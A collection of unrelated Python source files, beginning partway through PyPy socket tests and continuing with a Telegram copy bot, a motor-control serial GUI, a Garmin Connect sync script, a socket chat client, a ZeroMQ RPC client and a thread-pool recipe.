import re
from rpython.rlib import _rsocket_rffi
srcfile = _rsocket_rffi.__file__
if srcfile.lower().endswith('c') or srcfile.lower().endswith('o'):
srcfile = srcfile[:-1] # .pyc => .py
assert srcfile.lower().endswith('.py')
sourcelines = open(srcfile, 'rb').read().splitlines()
found = False
for i, line in enumerate(sourcelines):
line2 = re.sub(r"(\s*COND_HEADER\s*=)",
r"\1'#undef %s\\n'+" % cond,
line)
if line2 != line:
found = True
sourcelines[i] = line2
assert found
d = {}
sourcelines.append('')
exec('\n'.join(sourcelines), d)
def test_no_AF_PACKET():
_test_cond_include('AF_PACKET')
def test_no_AF_NETLINK():
_test_cond_include('AF_NETLINK')
@pytest.mark.xfail(reason="hits non-thread-safe issues with ll2ctypes")
def test_thread_safe_gethostbyaddr():
import threading
nthreads = 10
ip = '8.8.8.8'
domain = gethostbyaddr(ip)[0]
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_addr(ip, i):
name, aliases, address_list = gethostbyaddr(ip, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_addr, args=[ip, i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
@pytest.mark.xfail(reason="hits non-thread-safe issues with ll2ctypes")
def test_thread_safe_gethostbyname_ex():
import threading
nthreads = 10
domain = 'google.com'
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_name(i):
name, aliases, address_list = gethostbyname_ex(domain, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_name, args=[i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
@pytest.mark.xfail(reason="hits non-thread-safe issues with ll2ctypes")
def test_getaddrinfo_pydotorg_threadsafe():
import threading
nthreads = 10
result = [0] * nthreads
threads = [None] * nthreads
for i in range(nthreads):
threads[i] = threading.Thread(target = getaddrinfo_pydotorg, args=[i, result])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_translate_netdb_lock():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [])
assert fc() == 0
def test_translate_netdb_lock_thread():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [], thread=True)
assert fc() == 0
def test_socket_saves_errno(do_recv):
# ensure errno is set to a known value...
unconnected_sock = RSocket()
with pytest.raises(CSocketError) as e:
do_recv(unconnected_sock, 1024)
# ...which is ENOTCONN
assert e.value.errno == errno.ENOTCONN
with pytest.raises(CSocketError) as e:
RSocket(family=AF_INET, type=SOCK_STREAM, proto=SOL_UDP)
assert e.value.errno in (errno.EPROTOTYPE, errno.EPROTONOSUPPORT)
@pytest.mark.skipif(fcntl is None, reason="requires fcntl")
def test_socket_init_non_blocking():
import fcntl, os
s = RSocket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK)
assert s.type == SOCK_STREAM
assert s.gettimeout() == 0.0
assert fcntl.fcntl(s.fd, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK
# It is a bad idea to change running system's hostname, so do it only
# if we can reasonably assume the request will be rejected, i.e. we don't
# have superuser privileges.
@pytest.mark.skipif(sys.platform == "win32",
reason='No sethostname on Windows')
@pytest.mark.skipif(not hasattr(os, 'geteuid') or os.geteuid() == 0,
reason='Running as superuser is not supported.')
def test_sethostname():
# just in case it worked anyway, use the old hostname
s = gethostname()
with pytest.raises(CSocketError) as e:
sethostname(s)
assert e.value.errno == errno.EPERM
|
iCopy.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os, sys, logging
from telegram import Bot
from telegram.utils.request import Request as TGRequest
from utils import load
from telegram.ext import (
Updater,
CommandHandler,
MessageHandler,
Filters,
CallbackQueryHandler,
ConversationHandler,
)
from utils import (
get_set as _set,
get_functions as _func,
task_box as _box,
task_payload as _payload,
callback_stage as _stage,
__version__,
)
from workflow import (
start_workflow as _start,
quick_workflow as _quick,
copy_workflow as _copy,
size_workflow as _size,
regex_workflow as _regex,
purge_workflow as _purge,
dedupe_workflow as _dedupe,
)
from multiprocessing import Process as _mp, Manager
from threading import Thread
from utils.load import ns
#from web import dash
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
# ############################### Main ####################################
def main():
### bot define
request = TGRequest(con_pool_size=8)
bot = Bot(token=f"{load.cfg['tg']['token']}", request=request)
updater = Updater(bot=bot, use_context=True)
### judge is restart
is_restart = load.db_counters.find_one({"_id": "is_restart"})
if is_restart is not None:
if is_restart["status"] == 0:
pass
else:
_func.check_restart(bot)
else:
load.db_counters.update(
{"_id": "is_restart"}, {"status": 0}, upsert=True,
)
dp = updater.dispatcher
# Entry Conversation
conv_handler = ConversationHandler(
entry_points=[
# Entry Points
CommandHandler("set", _set._setting),
CommandHandler("menu", _start.menu),
CommandHandler("quick", _quick.quick),
CommandHandler("copy", _copy.copy),
CommandHandler("task", _box.taskinfo),
CommandHandler("size", _size.size),
CommandHandler("purge", _purge.purge),
CommandHandler("dedupe", _dedupe.dedupe),
MessageHandler(
Filters.regex(pattern=load.regex_entry_pattern), _regex.regex_entry
),
],
states={
_stage.SET_FAV_MULTI: [
# fav settings function
MessageHandler(Filters.text, _set._multi_settings_recieved),
],
_stage.CHOOSE_MODE: [
# call function judged via callback pattern
CallbackQueryHandler(_quick.quick, pattern="quick"),
CallbackQueryHandler(_copy.copy, pattern="copy"),
],
_stage.GET_LINK: [
# get Shared_Link states
MessageHandler(Filters.text, _func.get_share_link),
],
_stage.IS_COVER_QUICK: [
# cover quick setting
CallbackQueryHandler(_func.modify_quick_in_db, pattern="cover_quick"),
CallbackQueryHandler(_func.cancel, pattern="not_cover_quick"),
MessageHandler(Filters.text, _func.cancel),
],
_stage.GET_DST: [
# request DST
CallbackQueryHandler(_copy.request_srcinfo),
],
_stage.COOK_ID: [
# request to COOK ID
MessageHandler(Filters.text, _size.size_handle),
],
_stage.REGEX_IN: [
# regex in choose mode
CallbackQueryHandler(_regex.regex_callback, pattern=r"quick|copy|size"),
],
_stage.REGEX_GET_DST: [
# regex copy end
CallbackQueryHandler(_regex.regex_copy_end),
],
_stage.COOK_FAV_TO_SIZE: [CallbackQueryHandler(_size.pre_cook_fav_to_size),],
_stage.COOK_FAV_PURGE: [CallbackQueryHandler(_purge.pre_to_purge),],
_stage.COOK_ID_DEDU: [CallbackQueryHandler(_dedupe.dedupe_mode),],
_stage.COOK_FAV_DEDU: [CallbackQueryHandler(_dedupe.dedupe_fav_mode),],
_stage.FAV_PRE_DEDU_INFO: [CallbackQueryHandler(_dedupe.pre_favdedu_info)],
},
fallbacks=[CommandHandler("cancel", _func.cancel)],
)
def stop_and_restart():
progress.terminate()
load.myclient.close()
updater.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
def restart(update, context):
restart_msg = update.message.reply_text(load._text[load._lang]["is_restarting"])
restart_chat_id = restart_msg.chat_id
restart_msg_id = restart_msg.message_id
load.db_counters.update_one(
{"_id": "is_restart"},
{
"$set": {
"status": 1,
"chat_id": restart_chat_id,
"message_id": restart_msg_id,
}
},
True,
)
Thread(target=stop_and_restart).start()
dp.add_handler(conv_handler)
dp.add_handler(CommandHandler("start", _start.start))
dp.add_handler(CommandHandler("reset", _box.task_reset))
dp.add_handler(CommandHandler("kill", _func.taskill))
dp.add_handler(CommandHandler("ver", _func._version))
dp.add_handler(
CommandHandler(
"restart",
restart,
filters=Filters.user(user_id=int(load.cfg["tg"]["usr_id"])),
)
)
dp.add_error_handler(_func.error)
updater.start_polling()
logger.info("Fxxkr LAB iCopy " + __version__.__version__ + " Start")
updater.idle()
if __name__ == "__main__":
ns.x = 0
progress = _mp(target=_payload.task_buffer, args=(ns,))
progress.start()
#web = _mp(target=dash.dashboard)
#web.start()
main()
|
bldc_control.py
|
from tuw.Serial import *
from tuw.Figure import *
from matplotlib import pyplot as plt
import string
default_port='/dev/ttyACM0'
ser = MySerial(default_port)
def readPort(fig):
last = MyParam()
last.target = np.NaN
last.steering = 0
last.kp = np.NaN
last.ki = np.NaN
last.kd = np.NaN
while True :
line = ser.readline()
try:
if (line[0] == '$'):
if (line[1] == 's'):
values = line[2:]
words = string.split(values,",") # Fields split
if len(words) == 3:
current_pwm = float(words[0])
current_rps = float(words[1])
current_rps_target = float(words[2])
fig.set(current_pwm, current_rps, current_rps_target)
if(last.target != fig.param.target) :
last.target = fig.param.target
ser.writeline('t',last.target)
if(last.kp != fig.param.kp) :
last.kp = fig.param.kp
ser.writeline('p',last.param.kp)
if(last.ki != fig.param.ki) :
last.ki = fig.param.ki
ser.writeline('i',last.param.ki)
if(last.kd != fig.param.kd) :
last.kd = fig.param.kd
ser.writeline('d',last.kd)
if(last.steering != fig.param.steering) :
last.steering = fig.param.steering
ser.writeline('s',last.steering)
else :
print "cmd: " + line
else :
print "msg: " + line
except :
print "no msg" + line
def update(fig):
while True:
fig.plot()
time.sleep(0.01)
if __name__ == '__main__':
fig = plt.figure(FigureClass=MyFigure, figtitle='my title')
fig.init_gui()
t1 = threading.Thread(target=readPort,args=(fig, ))
t1.start()
t2 = threading.Thread(target=update,args=(fig, ))
t2.start()
plt.show()
|
garmin_sync.py
|
# -*- coding: utf-8 -*-
"""
Python 3 API wrapper for Garmin Connect to get your statistics.
Copy most code from https://github.com/cyberjunky/python-garminconnect
"""
import argparse
import json
import logging
import os
import time
import re
from threading import Thread
from enum import Enum, auto
import requests
from config import GPX_FOLDER, JSON_FILE, SQL_FILE
from utils import make_activities_file
GARMIN_COM_URL_DICT = {
"BASE_URL": "https://connect.garmin.com",
"SSO_URL_ORIGIN": "https://sso.garmin.com",
"SSO_URL": "https://sso.garmin.com/sso",
"MODERN_URL": "https://connect.garmin.com/modern",
"SIGNIN_URL": "https://sso.garmin.com/sso/signin",
"CSS_URL": "https://static.garmincdn.com/com.garmin.connect/ui/css/gauth-custom-v1.2-min.css",
}
GARMIN_CN_URL_DICT = {
"BASE_URL": "https://connect.garmin.cn",
"SSO_URL_ORIGIN": "https://sso.garmin.com",
"SSO_URL": "https://sso.garmin.cn/sso",
"MODERN_URL": "https://connect.garmin.cn/modern",
"SIGNIN_URL": "https://sso.garmin.cn/sso/signin",
"CSS_URL": "https://static.garmincdn.cn/cn.garmin.connect/ui/css/gauth-custom-v1.2-min.css",
}
class Garmin:
def __init__(self, email, password, is_CN=True):
"""
Init module
"""
self.email = email
self.password = password
self.req = requests.session()
self.logger = logging.getLogger(__name__)
self.display_name = ""
self.full_name = ""
self.unit_system = ""
self.URL_DICT = GARMIN_CN_URL_DICT if is_CN else GARMIN_COM_URL_DICT
MODERN_URL = self.URL_DICT.get("MODERN_URL")
self.url_user_summary = (
MODERN_URL + "/proxy/usersummary-service/usersummary/daily/"
)
self.url_user_summary_chart = (
MODERN_URL + "/proxy/wellness-service/wellness/dailySummaryChart/"
)
self.url_heartrates = (
MODERN_URL + "/proxy/wellness-service/wellness/dailyHeartRate/"
)
self.url_activities = (
MODERN_URL + "/proxy/activitylist-service/activities/search/activities"
)
self.url_exercise_sets = MODERN_URL + "/proxy/activity-service/activity/"
self.url_tcx_download = (
MODERN_URL + "/proxy/download-service/export/tcx/activity/"
)
self.url_gpx_download = (
MODERN_URL + "/proxy/download-service/export/gpx/activity/"
)
self.url_fit_download = MODERN_URL + "/proxy/download-service/files/activity/"
self.url_csv_download = (
MODERN_URL + "/proxy/download-service/export/csv/activity/"
)
self.url_device_list = (
MODERN_URL + "/proxy/device-service/deviceregistration/devices"
)
self.url_device_settings = (
MODERN_URL + "/proxy/device-service/deviceservice/device-info/settings/"
)
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36",
"origin": self.URL_DICT.get("SSO_URL_ORIGIN"),
}
def login(self):
"""
Login to portal
"""
params = {
"webhost": self.URL_DICT.get("BASE_URL"),
"service": self.URL_DICT.get("MODERN_URL"),
"source": self.URL_DICT.get("SIGNIN_URL"),
"redirectAfterAccountLoginUrl": self.URL_DICT.get("MODERN_URL"),
"redirectAfterAccountCreationUrl": self.URL_DICT.get("MODERN_URL"),
"gauthHost": self.URL_DICT.get("SSO_URL"),
"locale": "en_US",
"id": "gauth-widget",
"cssUrl": self.URL_DICT.get("CSS_URL"),
"clientId": "GarminConnect",
"rememberMeShown": "true",
"rememberMeChecked": "false",
"createAccountShown": "true",
"openCreateAccount": "false",
"usernameShown": "false",
"displayNameShown": "false",
"consumeServiceTicket": "false",
"initialFocus": "true",
"embedWidget": "false",
"generateExtraServiceTicket": "false",
}
data = {
"username": self.email,
"password": self.password,
"embed": "true",
"lt": "e1s1",
"_eventId": "submit",
"displayNameRequired": "false",
}
try:
response = self.req.post(
self.URL_DICT.get("SIGNIN_URL"),
headers=self.headers,
params=params,
data=data,
)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
response.raise_for_status()
self.logger.debug("Login response code %s", response.status_code)
except requests.exceptions.HTTPError as err:
raise GarminConnectConnectionError("Error connecting") from err
self.logger.debug("Response is %s", response.text)
response_url = re.search(r'"(https:[^"]+?ticket=[^"]+)"', response.text)
if not response_url:
raise GarminConnectAuthenticationError("Authentication error")
response_url = re.sub(r"\\", "", response_url.group(1))
self.logger.debug("Fetching profile info using found response url")
try:
response = self.req.get(response_url)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
response.raise_for_status()
except requests.exceptions.HTTPError as err:
raise GarminConnectConnectionError("Error connecting") from err
self.user_prefs = self.parse_json(response.text, "VIEWER_USERPREFERENCES")
self.unit_system = self.user_prefs["measurementSystem"]
self.social_profile = self.parse_json(response.text, "VIEWER_SOCIAL_PROFILE")
self.display_name = self.social_profile["displayName"]
self.full_name = self.social_profile["fullName"]
def parse_json(self, html, key):
"""
Find and return json data
"""
found = re.search(key + r" = JSON.parse\(\"(.*)\"\);", html, re.M)
if found:
text = found.group(1).replace('\\"', '"')
return json.loads(text)
def fetch_data(self, url):
"""
Fetch and return data
"""
try:
response = self.req.get(url, headers=self.headers)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
self.logger.debug("Fetch response code %s", response.status_code)
response.raise_for_status()
except requests.exceptions.HTTPError as err:
self.logger.debug(
"Exception occurred during data retrieval - perhaps session expired - trying relogin: %s"
% err
)
self.login()
try:
response = self.req.get(url, headers=self.headers)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
self.logger.debug("Fetch response code %s", response.status_code)
response.raise_for_status()
except requests.exceptions.HTTPError as err:
self.logger.debug(
"Exception occurred during data retrieval, relogin without effect: %s"
% err
)
raise GarminConnectConnectionError("Error connecting") from err
resp_json = response.json()
self.logger.debug("Fetch response json %s", resp_json)
return resp_json
def get_full_name(self):
"""
Return full name
"""
return self.full_name
def get_unit_system(self):
"""
Return unit system
"""
return self.unit_system
def get_stats_and_body(self, cdate):
"""
Return activity data and body composition
"""
return {
**self.get_stats(cdate),
**self.get_body_composition(cdate)["totalAverage"],
}
def get_stats(self, cdate): # cDate = 'YYY-mm-dd'
"""
Fetch available activity data
"""
summaryurl = (
self.url_user_summary + self.display_name + "?" + "calendarDate=" + cdate
)
self.logger.debug("Fetching statistics %s", summaryurl)
try:
response = self.req.get(summaryurl, headers=self.headers)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
self.logger.debug("Statistics response code %s", response.status_code)
response.raise_for_status()
except requests.exceptions.HTTPError as err:
raise GarminConnectConnectionError("Error connecting") from err
resp_json = response.json()
if resp_json["privacyProtected"] is True:
self.logger.debug("Session expired - trying relogin")
self.login()
try:
response = self.req.get(summaryurl, headers=self.headers)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
self.logger.debug("Statistics response code %s", response.status_code)
response.raise_for_status()
except requests.exceptions.HTTPError as err:
self.logger.debug(
"Exception occurred during statistics retrieval, relogin without effect: %s"
% err
)
raise GarminConnectConnectionError("Error connecting") from err
else:
resp_json = response.json()
return resp_json
def get_activities(self, start, limit):
"""
Fetch available activities
"""
activitiesurl = (
self.url_activities + "?start=" + str(start) + "&limit=" + str(limit)
)
return self.fetch_data(activitiesurl)
def get_excercise_sets(self, activity_id):
activity_id = str(activity_id)
exercisesetsurl = f"{self.url_exercise_sets}{activity_id}/exerciseSets"
self.logger.debug(f"Fetching exercise sets for activity_id {activity_id}")
return self.fetch_data(exercisesetsurl)
class ActivityDownloadFormat(Enum):
ORIGINAL = auto()
TCX = auto()
GPX = auto()
CSV = auto()
def download_activity(self, activity_id, dl_fmt=ActivityDownloadFormat.TCX):
"""
Downloads activity in requested format and returns the raw bytes. For
"Original" will return the zip file content, up to user to extract it.
"CSV" will return a csv of the splits.
"""
activity_id = str(activity_id)
urls = {
Garmin.ActivityDownloadFormat.ORIGINAL: f"{self.url_fit_download}{activity_id}",
Garmin.ActivityDownloadFormat.TCX: f"{self.url_tcx_download}{activity_id}",
Garmin.ActivityDownloadFormat.GPX: f"{self.url_gpx_download}{activity_id}",
Garmin.ActivityDownloadFormat.CSV: f"{self.url_csv_download}{activity_id}",
}
if dl_fmt not in urls:
raise ValueError(f"Unexpected value {dl_fmt} for dl_fmt")
url = urls[dl_fmt]
self.logger.debug(f"Downloading from {url}")
try:
response = self.req.get(url, headers=self.headers)
if response.status_code == 429:
raise GarminConnectTooManyRequestsError("Too many requests")
except requests.exceptions.HTTPError as err:
raise GarminConnectConnectionError("Error connecting")
return response.content
class GarminConnectConnectionError(Exception):
"""Raised when communication ended in error."""
def __init__(self, status):
"""Initialize."""
super(GarminConnectConnectionError, self).__init__(status)
self.status = status
class GarminConnectTooManyRequestsError(Exception):
"""Raised when rate limit is exceeded."""
def __init__(self, status):
"""Initialize."""
super(GarminConnectTooManyRequestsError, self).__init__(status)
self.status = status
class GarminConnectAuthenticationError(Exception):
"""Raised when login returns wrong result."""
def __init__(self, status):
"""Initialize."""
super(GarminConnectAuthenticationError, self).__init__(status)
self.status = status
def download_garmin_gpx(client, activity_id):
try:
gpx_data = client.download_activity(
activity_id, dl_fmt=client.ActivityDownloadFormat.GPX
)
file_path = os.path.join(GPX_FOLDER, activity_id + ".gpx")
with open(file_path, "wb") as fb:
fb.write(gpx_data)
except:
print(f"wrong id {activity_id}")
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("email", help="email of garmin")
parser.add_argument("password", help="password of garmin")
parser.add_argument(
"--is-cn",
dest="is_cn",
action="store_true",
help="if garmin accout is com",
)
options = parser.parse_args()
client = Garmin(options.email, options.password, options.is_cn)
client.login()
limit, start = 100, 0
count = 0
# because I don't find a para for after time, so I use garmin-id as filename
# to find new run to generage
old_garmin_ids = os.listdir(GPX_FOLDER)
old_garmin_ids = [i.split(".")[0] for i in old_garmin_ids]
api_garmin_ids = []
while True:
activities = client.get_activities(start, limit)
for a in activities:
if a.get("activityId") is None:
print("Skipping activity without id")
continue
api_garmin_ids.append(str(a.get("activityId")))
activities_count = len(activities)
count += activities_count
print(f"parsing from {start} to {count}")
start += 100
# tricky break
if activities_count != limit:
break
to_generate_garmin_ids = list(set(api_garmin_ids) - set(old_garmin_ids))
print(f"{len(to_generate_garmin_ids)} new runs to generate")
start_time = time.time()
threads = []
for i in to_generate_garmin_ids:
t = Thread(target=download_garmin_gpx, args=(client, i))
threads.append(t)
t.start()
for thread in threads:
thread.join()
print(f"cost {time.time()-start_time} s for gpx")
time.sleep(60) # waiting
make_activities_file(SQL_FILE, GPX_FOLDER, JSON_FILE)
|
client.py
|
import socket
import threading
import os
import signal
from sys import platform
import sys
import base64
class clientType:
PORT = 5050
DISCONNECT_MESSAGE = "exit"
passkey = ''
IP = ''
username = ''
client = ''
def __init__(self):
if platform == "linux" or platform == "linux2" or platform == "darwin":
os.system('clear')
elif platform == "win32":
os.system('cls')
else:
print('Unsupported OS')
exit(1)
self.passkey = sys.argv[1]
self.IP = self.decode_key(self.passkey)
self.mainFunc()
def getName(self):
self.username = input("Enter your username: ")
while not self.username.isalpha():
print(" \n \t ERROR: The username should only contain alphabates. \n")
self.username = input('Enter server name : ')
def decode_key(self, valu):
try:
decoded_data = base64.b64decode(valu)
dec_ip = decoded_data.decode('utf-8')
if len(dec_ip) == 8:
dec_ip = '192.168' + dec_ip.lstrip('0')
elif len(dec_ip) == 15:
dec_ip = dec_ip.lstrip('0')
elif len(dec_ip) == 0:
print("Please enter a passkey \n ")
self.passkey = input(" Re-enter your accesskey : ")
dec_ip = self.decode_key(self.passkey)
else:
print("Please enter the correct passkey \n ")
self.passkey = input(" Re-enter your accesskey : ")
dec_ip = self.decode_key(self.passkey)
except (ConnectionRefusedError, UnicodeDecodeError, UnboundLocalError, base64.binascii.Error):
print("Please enter the correct passkey \n ")
self.passkey = input(" Re-enter your accesskey : ")
dec_ip = self.decode_key(self.passkey)
finally:
return dec_ip
def receive(self):
#self. username
while True:
try:
message = self.client.recv(1024).decode('utf-8')
if message == 'Connect':
self.client.send(self.username.encode('utf-8'))
elif message == 'Server left':
print('\nServer has disconnected\n')
os._exit(0)
elif message.startswith("image:"):
fname,fsize = message[7:].split()
fpath='Proximity_images'
if not os.path.exists(fpath):
os.mkdir(fpath)
fsize = int(fsize)
c=0
k=(fsize//512)*512
fname1 = fpath+'/'+fname
try:
with open(fname1,"wb") as f:
while True:
chunk=self.client.recv(512)
if not chunk:
break
f.write(chunk)
c+=512
if c==k:
break
if fsize-k:
chunk=self.client.recv(fsize-k+1)
f.write(chunk)
print(f"[{self.username} : Sent {fname}]")
except:
print("An error occured!")
elif 'Connected to' in message:
print('\n \t ', message, '\n')
elif 'Username updated to [' in message:
print(message)
self.username = message[25:-1]
elif message.startswith("file:"):
filename, filesize = message[5:].split(";")
# remove absolute path if there is
filename = os.path.basename(filename)
# convert to integer
filesize = int(filesize)
if not os.path.exists('Proximity_files'):
os.mkdir('Proximity_files')
filename = os.path.join('Proximity_files', filename)
with open(filename, "wb") as f:
bytes_read = self.client.recv(filesize)
f.write(bytes_read)
else:
print('\t\t\t\t', message)
except:
print("An error occured!")
self.client.close()
break
def write(self):
while True:
try:
input_val = input()
if input_val == self.DISCONNECT_MESSAGE:
self.client.send(self.DISCONNECT_MESSAGE.encode('utf-8'))
self.client.close()
print('You will be disconnected')
os._exit(0)
elif input_val.startswith("image:"):
fname = input_val.split()[1]
fsize = os.path.getsize(fname)
iname=os.path.basename(fname)
message='image: '+iname+' '+str(fsize)
self.client.send(message.encode('utf-8'))
k=(fsize//512)*512
c=0
try:
with open(fname,"rb") as f:
while True:
chunks = f.read(512)
if not chunks:
break
c+=512
self.client.send(chunks)
if c==k:
break
if fsize-k:
chunks=f.read(fsize-k+1)
self.client.send(chunks)
print(f'Sent {fname} successfully')
except:
print("An error occured!")
elif input_val.startswith("file:"):
filename=input_val[5:]
filesize=os.path.getsize("Proximity_files/Client/"+filename)
message = input_val+";"+str(filesize)
self.client.send(message.encode('utf-8'))
with open(("Proximity_files/Client/"+filename), "rb") as f:
bytes_read = f.read(filesize)
self.client.send(bytes_read)
print("File sent")
else:
message = '[{}] : {}'.format(self.username, input_val)
self.client.send(message.encode('utf-8'))
except:
print('\n \t Error Occoured while Reading input \n')
self.client.send(self.DISCONNECT_MESSAGE.encode('utf-8'))
self.client.close()
print('You will be disconnected')
os._exit(0)
def keyboardInterruptHandler(self, signal, frame):
print('Interrupted')
self.client.send(self.DISCONNECT_MESSAGE.encode('utf-8'))
self.client.close()
print('You will be disconnected')
os._exit(0)
def mainFunc(self):
self.getName()
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((self.IP, self.PORT))
signal.signal(signal.SIGINT, self.keyboardInterruptHandler)
receive_thread = threading.Thread(target=self.receive)
receive_thread.start()
write_thread = threading.Thread(target=self.write)
write_thread.start()
c1 = clientType()
|
client.py
|
import threading
from datetime import datetime
from functools import lru_cache
from typing import Any
import zmq
from zmq.backend.cython.constants import NOBLOCK
from .common import HEARTBEAT_TOPIC, HEARTBEAT_TOLERANCE
class RemoteException(Exception):
"""
RPC remote exception
"""
def __init__(self, value: Any):
"""
Constructor
"""
self._value = value
def __str__(self):
"""
Output error message
"""
return self._value
class RpcClient:
""""""
def __init__(self):
"""Constructor"""
# zmq port related
self._context: zmq.Context = zmq.Context()
# Request socket (Request–reply pattern)
self._socket_req: zmq.Socket = self._context.socket(zmq.REQ)
# Subscribe socket (Publish–subscribe pattern)
self._socket_sub: zmq.Socket = self._context.socket(zmq.SUB)
# Worker thread relate, used to process data pushed from server
self._active: bool = False # RpcClient status
self._thread: threading.Thread = None # RpcClient thread
self._lock: threading.Lock = threading.Lock()
self._last_received_ping: datetime = datetime.utcnow()
@lru_cache(100)
def __getattr__(self, name: str):
"""
Realize remote call function
"""
# Perform remote call task
def dorpc(*args, **kwargs):
# Get timeout value from kwargs, default value is 30 seconds
if "timeout" in kwargs:
timeout = kwargs.pop("timeout")
else:
timeout = 30000
# Generate request
req = [name, args, kwargs]
# Send request and wait for response
with self._lock:
self._socket_req.send_pyobj(req)
# Timeout reached without any data
n = self._socket_req.poll(timeout)
if not n:
msg = f"Timeout of {timeout}ms reached for {req}"
raise RemoteException(msg)
rep = self._socket_req.recv_pyobj()
# Return response if successed; Trigger exception if failed
if rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
return dorpc
def start(
self,
req_address: str,
sub_address: str
) -> None:
"""
Start RpcClient
"""
if self._active:
return
# Connect zmq port
self._socket_req.connect(req_address)
self._socket_sub.connect(sub_address)
# Start RpcClient status
self._active = True
# Start RpcClient thread
self._thread = threading.Thread(target=self.run)
self._thread.start()
self._last_received_ping = datetime.utcnow()
def stop(self) -> None:
"""
Stop RpcClient
"""
if not self._active:
return
# Stop RpcClient status
self._active = False
def join(self) -> None:
# Wait for RpcClient thread to exit
if self._thread and self._thread.is_alive():
self._thread.join()
self._thread = None
def run(self) -> None:
"""
Run RpcClient function
"""
pull_tolerance = HEARTBEAT_TOLERANCE * 1000
while self._active:
if not self._socket_sub.poll(pull_tolerance):
self.on_disconnected()
continue
# Receive data from subscribe socket
topic, data = self._socket_sub.recv_pyobj(flags=NOBLOCK)
if topic == HEARTBEAT_TOPIC:
self._last_received_ping = data
else:
# Process data by callable function
self.callback(topic, data)
# Close socket
self._socket_req.close()
self._socket_sub.close()
def callback(self, topic: str, data: Any) -> None:
"""
Callable function
"""
raise NotImplementedError
def subscribe_topic(self, topic: str) -> None:
"""
Subscribe data
"""
self._socket_sub.setsockopt_string(zmq.SUBSCRIBE, topic)
def on_disconnected(self):
"""
Callback when heartbeat is lost.
"""
msg = f"RpcServer has no response over {HEARTBEAT_TOLERANCE} seconds, please check you connection."
print(msg)
|
recipe-576910.py
|
#! /usr/bin/python
import threading
import queue
import time
import sys
Instance = None
def getInstance():
global Instance
if not Instance:
Instance = ThreadPool()
return Instance
class ThreadPool:
def __init__(self,maxWorkers = 10):
self.tasks = queue.Queue()
self.workers = 0
self.working = 0
self.maxWorkers = maxWorkers
self.allKilled = threading.Event()
self.countLock = threading.RLock()
self.timers = {}
self.timersLock = threading.Lock()
self.timersThreadLock = threading.Lock()
self.timersEvent = threading.Event()
self.allKilled.set()
def run(self,target,callback = None, *args, **kargs):
""" starts task.
target = callable to run with *args and **kargs arguments.
callback = callable executed when target ends
callback sould accept one parameter where target's
return value is passed.
If callback is None it's ignored.
"""
self.countLock.acquire()
if not self.workers:
self.addWorker()
self.countLock.release()
self.tasks.put((target,callback,args,kargs))
def setMaxWorkers(self,num):
""" Sets the maximum workers to create.
num = max workers
If number passed is lower than active workers
it will kill workers to match that number.
"""
self.countLock.acquire()
self.maxWorkers = num
if self.workers > self.maxWorkers:
self.killWorker(self.workers - self.maxWorkers)
self.countLock.release()
def addWorker(self,num = 1):
""" Add workers.
num = number of workers to create/add.
"""
for x in range(num):
self.countLock.acquire()
self.workers += 1
self.allKilled.clear()
self.countLock.release()
t = threading.Thread(target = self.__workerThread)
t.setDaemon(True)
t.start()
def killWorker(self,num = 1):
""" Kill workers.
num = number of workers to kill.
"""
self.countLock.acquire()
if num > self.workers:
num = self.workers
self.countLock.release()
for x in range(num):
self.tasks.put("exit")
def killAllWorkers(self,wait = None):
""" Kill all active workers.
wait = seconds to wait until last worker ends
if None it waits forever.
"""
self.countLock.acquire()
self.killWorker(self.workers)
self.countLock.release()
self.allKilled.wait(wait)
def __workerThread(self):
while True:
task = self.tasks.get()
# exit is "special" tasks to kill thread
if task == "exit":
break
self.countLock.acquire()
self.working += 1
if (self.working >= self.workers) and (self.workers < self.maxWorkers): # create thread on demand
self.addWorker()
self.countLock.release()
fun,cb,args,kargs = task
try:
ret = fun(*args,**kargs)
if cb:
cb(ret)
except:
print("Unexpected error:", sys.exc_info())
self.countLock.acquire()
self.working -= 1
self.countLock.release()
self.countLock.acquire()
self.workers -= 1
if not self.workers:
self.allKilled.set()
self.countLock.release()
def timer(self, cb, period):
""" Add or remove timers.
cb = callback function.
period = period in seconds (float)
if period is 0 timer is deleted.
"""
self.run(self.__timerThread, None, cb, period)
def __timerThread(self, cb, period):
self.timersLock.acquire()
self.timersEvent.set()
if not period:
if cb in self.timers:
del(self.timers[cb])
self.timersLock.release()
return
self.timers[cb] = [period,time.time()]
self.timersLock.release()
if not self.timersThreadLock.acquire(0):
return
while True:
self.timersLock.acquire()
if len(self.timers) == 0:
self.timersThreadLock.release()
self.timersLock.release()
break
minWait = 30*24*3600
now = time.time()
for k,v in list(self.timers.items()):
period, last = v
wait = period - (now - last)
if wait <=0:
self.run(k)
wait = period
v[1] = now
if wait < minWait:
minWait = wait
self.timersLock.release()
